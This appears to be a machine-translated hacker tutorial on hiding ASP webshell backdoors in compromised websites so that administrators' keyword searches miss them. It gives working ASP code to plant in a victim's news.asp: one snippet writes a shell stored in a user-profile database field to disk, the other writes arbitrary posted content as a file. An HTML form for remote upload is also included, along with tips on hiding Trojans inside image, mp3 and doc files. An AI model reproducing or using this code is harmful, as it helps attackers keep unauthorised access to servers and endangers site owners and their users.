Preface: It has been a long time, from the initial site manager to the several popular ASP backdoors now. I believe that most network administrators can name these classic webshells, such as Haiyang, Veteran, Blue Screen, etc. I also believe that most network administrators can name them. I learned the keyword search method to search for these Trojans. Of course, if you want to hide the backdoor in today's time, you need to use some skills. As the saying goes, "The Buddha is one foot tall, and I am one foot tall."
I don't deny that writing the asp Trojan into the picture file as mentioned earlier is a good method. In fact, it can be written not only into pictures, but also into mp3 files and into doc files.
The method ofcopy file name/parameter + file name/parameter to generate file name
can be used flexibly to achieve the purpose of hiding files. The specific parameters are /a in acsic code mode, /b in binary mode, so I won’t go into too much detail. , As for how to upload webshell, what is webshell is not within the scope of this article. What we are going to talk about today is how to put the backdoor into the database with the suffix .mdb. The premise is that after we get a webshell...
As we know, many sites have to fill in a lot of things when users register, such as: user name, Password, QQ, email, personal profile, phone number, contact information, address, etc. There will also be corresponding tables, fields, and values corresponding to the database. What I want to do today is to register a user and write shell code in my personal profile, and then modify a file on his site. When this file is triggered when using it, I will put the shell code in my personal resume. Back up to the current directory.
Without further ado, let’s take a look at the code:
<%
if request("action")="firefox" then
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
set rs=server.createobject("ADODB.recordset")
sql="select "& bname & " from "&tname& " where "&id&"="&idvalue&""""
rs.open sql,conn,1,3
if not rs.eof then
content=rs(bname)
else
response.write "Nothing"
end if
set fso=Server.createObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(content)
txtfile.close
end if
%>
Add the above code to a file on the site, such as news.asp. According to the information we know, after registering on its site, download the database to see the structure. The firefox name I registered is in the user table, and its id value is 119. The table field used to store my registered resume is jl.
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
Then when using it, we can write a webshell named firefox.asp in the same directory as news.asp. The above can be said to be one of thousands of hiding methods. Next, let’s talk about another more convenient hiding method. This method has nothing to do with the mdb suffix.
Similarly, we still modify news.asp and insert the following code into the other party's news.asp:
<%
if request("action")="firefox" then
n=request.form("n")
c=request.form("c")
set fso=Server.createObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline(c)
txtfile.close
end if
%>
This code is relatively simple, it can be regarded as the server side of a Trojan horse. Use this code when using it:
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<title>Fst Firefox Technology Alliance[www.wrsky.com]</title>
<FORM action=" http://localhost/config.asp?action ... method=post>
<META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
<BODY>Name:<INPUT size=50
name=n width="32"><BR><BR>Shell:<TEXTAREA name=c rows=10 cols=80
width="32"></TEXTAREA><INPUT type=submit value=Save></FORM></BODY></HTML>
Change the above code: "http://localhost/config.asp?action= Replace "firefox" with your server address and save it as a local .htm file. After opening it locally, define the file name, file content, and remote submission to be generated. OK, this is another way to leave a backdoor.